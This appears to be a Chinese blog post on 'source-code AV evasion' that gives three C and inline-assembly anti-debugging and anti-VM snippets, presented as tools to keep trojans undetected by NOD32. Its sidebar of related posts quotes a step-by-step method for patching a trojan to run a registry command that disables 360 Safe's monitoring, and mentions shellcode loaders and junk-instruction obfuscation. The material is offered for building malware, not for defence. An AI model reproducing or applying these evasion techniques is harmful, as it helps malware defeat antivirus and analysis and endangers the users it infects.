源码免杀--反调试代码,免杀爱好者必备的利剑

最新推荐文章于 2024-07-23 14:38:11 发布
最新推荐文章于 2024-07-23 14:38:11 发布
阅读量3.5k 收藏 3
点赞数
分类专栏: 网络编程

源码免杀只处理特征码还是不够的,必须要加入反调试代码,这样才能更持久更耐用。这里就发几个暗夜经常用的反调试代码给大家。

 

1.

HKEY ck;
char strreg[] = {'S','O','F','T','W','A','R','E','\\','O','D','B','C','\0'};
if(ERROR_SUCCESS!=RegOpenKeyEx(HKEY_LOCAL_MACHINE,(LPCTSTR)strreg,0,KEY_ALL_ACCESS,&ck)) 
{
  return 0;
}
===================================================

2.
bool IsVirtualPC()//反nod32查杀
{
__try
{
  __asm
  {
   mov eax, 1
    _emit 0x0F
    _emit 0x3F
    _emit 0x07
    _emit 0x0B
    _emit 0xC7
    _emit 0x45
    _emit 0xFC
    _emit 0xFF
    _emit 0xFF
    _emit 0xFF
    _emit 0xFF
  }
}
__except(1)
{
  return FALSE;
}
return TRUE;
}

===========================================================
3.
if(IsVirtualPC())
{
  return 0;
}

_asm push esi;
_asm mov esi,46;
_asm inc esi;
_asm mov eax,dword ptr fs:[esi+1];
_asm mov eax,dword ptr ds:[eax+24];
_asm mov eax,dword ptr ds:[eax+12];
_asm cmp eax,2;
_asm pop esi;
_asm je Begin;
_asm lock dec ebx;
Begin:

H-KING
关注
专栏目录
爱心代码大全---含十余款特效源码【情人节表白代码
白大锅的博客,毕设WangLoveBai_999
02-10 9万+
十余款爱心酷炫告白特效等你来拿
下载马斯克Grok-1模型的实战代码
热门推荐
herosunly的博客
03-19 9万+
本文主要介绍了下载马斯克Grok-1模型的实战代码,希望能对学习大模型的同学们有所帮助。 文章目录 1. 前言 2. 下载方式一 3. 下载方式二
调试伪装加密免杀壳.加壳工具
01-14
调试伪装加密免杀壳.加壳工具ASM汇编 这个是最舒服的,用OD打开已经配置好的马,找0区(也可以用TOPO加空段)要很大一片哦!右击,选择“二进制”→“编辑”,在ASCII中输入“Cmd /c REG add HKLM\SOFTWARE\360Safe\safemon /v MonAccess /t REG_DWORD /d 0 /f”记下写入命令的改动的第一个地址,假设为401180。 再找一个小空段,记下地址,假设为40116A 写入: Push 401180 (也就是那个改动的地址) Call WinExec Jmp 原程序入口点(在OD右边窗口的EIP后面可以看到) 打开OC把40116A转换为文件偏移0000056A 再用PEditor打开,把原入口点改为0000056A 这样一个过360服务监控的木马就诞生了。 (大家完全可以按照加花的步骤来写,就是命令不同而已) 大家也可以禁用其他360的监控项目,即使加个花都没问题,随便大家发挥了。
定位免杀NOD32的一些经验
zhdd1234的专栏
10-08 4740
----collect dying site:http://www.idying.cn欢迎大家一起讨论先说下定位方法:1  NOD32不能正向定位的,定位出来也是不能修改的!针对nod32应该选择向定位,开始位置为400填充不一定是90 可以使任意的 现在填90有时候被干扰的2 使用排除法收集下目前免杀过NOD32的方法源码:1源码免杀的另类方法函数的延迟加载例:
【网络安全】简单的免杀方法(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Button12138的博客
07-23 756
小七免杀工具包里有很多的工具我就列出其中的一些常用的排名不分前后1、mycclMyccl作为05出品的一款定位工具,到现在还是独领风骚,实用性五星,稳定性五星。2、C32asm一款非常好的静态汇编工具一般人免杀定位出特征码后都会先到C32里面去改,如果不行就载入od。当然,源码免杀就直接看定位出的东西在源码所对应的代码修改就ok。3、OD作为一款神器,OD有很多作用,破解,免杀啊,都需要它,做免杀不必要学汇编,通读几遍80×86就差不多了4、LordPE。
c语言写免杀,cs免杀
weixin_42306938的博客
05-22 922
思路①利用c语言+veil实现免杀#include "pch.h"//可以删除#include #include #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//不显示窗口unsigned char shellcode[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\...
源码免杀辅助v4.0.exe
04-22
源码免杀辅助v4.0.exe
关于免杀NOD32高启发式侦查
06-17 1635
NOD32定位出来的特征码比较多,手动修改非常麻烦,如果时间不允许的情况下,可以使用比较生僻的加壳加密软件来处理一下,一般都能过!最常用的就是利用北斗加两次壳即可过NOD32!NOD32一般把特征码定位在输入表,输出表和节表三个地方,网上流传的过NOD32的方法是修改输入表,将函数名称用0填充然后在空白处加上被填充的函数名,再将IAT里函数对应的thunk值改到指向新的函数名称,这种方法固
java源码包---java 源码 大量 实例
04-18
Applet钢琴模拟程序java源码 2个目标文件,提供基本的音乐编辑功能。编辑音乐软件的朋友,这款实例会对你有所帮助。 Calendar万年历 1个目标文件 EJB 模拟银行ATM流程及操作源代码 6个目标文件,EJB来模拟银行ATM...
VC写的加密壳源码,可以免杀作用,代码清晰
12-06
5. **免杀技术**:除了加密外,免杀壳还需要包含一些对抗病毒软件的策略,如随机化API调用、动态生成代码、使用虚拟机等。 6. **测试样本**:可能包含一些经过加壳处理的PE文件,用于测试加壳效果和免杀能力。 ...
免费微信商城系统源码
07-10
【标题】"免费微信商城系统源码"是一个针对电商领域,特别是微信生态的开源软件项目。这个系统允许用户创建和管理自己的在线商店,利用微信平台的庞大用户基础,实现商品销售和服务提供。作为开源产品,它提供了源...
黑防免杀教程 过瑞星、卡巴、ESET NOD32
12-25
免杀课的一些基础:如何安装多个杀毒软件,和他相关的设置;什么需要免杀;见识常见的工具;加壳免杀
免杀基本知识,shellcode混淆免杀
白帽子凯哥聊黑客
06-17 1326
根据源代码我们看到在执行完call ebp以后,就执行了设置地址的操作,也就是说在shellcode中存在了弹连接的ip地址,这里我们将生成的exe程序放到debug程序中,根据c的源代码,我们的shellcode是在call eax中,所以首先要搜索call eax步入进去以后就进入到shellcde中的代码,在shellcode中找到call ebp。最常见的就是360,刚刚上传的木马没有报毒,但是几分钟之内就会被检测为病毒程序,就是因为360会使用云查杀技术,这也是360查杀能力强的原因。
c语言免杀火绒
记录学习,一起进步
11-18 750
c语言随机数异或加密免杀
免杀笔记 ---> C语言
huohaowen的博客
06-22 978
这次的更新可能有点慢,因为这段时间也比较忙,加上C语言还得和汇编结合,导致小编一个知识点总是得复揣摩(太菜了),所以免杀的更新篇幅长度可能会达到两个月和三个月,但是小编能保证,只要你能看懂这些笔记,那么我包你能过360的!!!
JavaScript 调试技巧
前端大全
03-09 976
(点击上方公众号,可快速关注)英文: x-c3ll   译文:FreeBuf.COMwww.freebuf.com/articles/system/163579.html写在前面的话在此之前,我一直都在研究JavaScript相关的调试技巧。但是当我在网上搜索相关资料时,我发现网上并没有多少关于这方面的文章,而且就算有也是非常不完整的那种。所以在这篇文章中,我打算跟大家总结一下关于JavaScr
c语言免杀程序源码,【程序源码】用纯C语言实现坦克大战
weixin_30663839的博客
05-18 230
/* time:2017/1/15 *//* edit:www.dotcpp.com */#include#include#include#include#include#define KEY_ESC 0x01#define KEY_SPACE 0x39#define KEY_UP 0x48#define KEY_LEFT 0x4b#define KEY_RIGHT 0x4d#define KEY...
c语言免杀花指令大全,免杀花指令
weixin_36219745的博客
05-18 896
今天送上经典花指令注:编写花指令,可参考以下成双指令,可任意自由组合.达到免杀效果.push ebppop ebppush eaxpop eaxpush esppop esppush 0push 0push 10 -------其中数字可以任意,注意与下面对应push -10nop -----------可任意在中间添加与它等效的:mov EDI,EDIadd esp,1 -------其中数字可...
exe免杀c语言,实验使用 C 编译 shellcode 免杀上线
weixin_39540018的博客
05-19 619
实验了一下这篇文章里面介绍的免杀方法:[使用 C 编译 shellcode 免杀上线](https://www.xljtj.com/archives/c-shellcode.html?from=timeline&isappinstalled=0)。这篇文章已经把步骤写的很清楚了,但是我会在本文中也记录清楚每一步,因为文章可能说没就没,记下来自己留个备份。顺便记下我遇到的几个mini tin...
免杀技术解析:应对NOD32的启发式与主动防御策略
"本文主要探讨了高启发与主动防御技术在基于源码免杀策略中的应用,特别是在应对NOD32等杀毒软件的挑战。文章提到了木马程序设计的通用组合函数,如URLDownloadToFile和WinExec,并讨论了如何通过调整程序框架...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值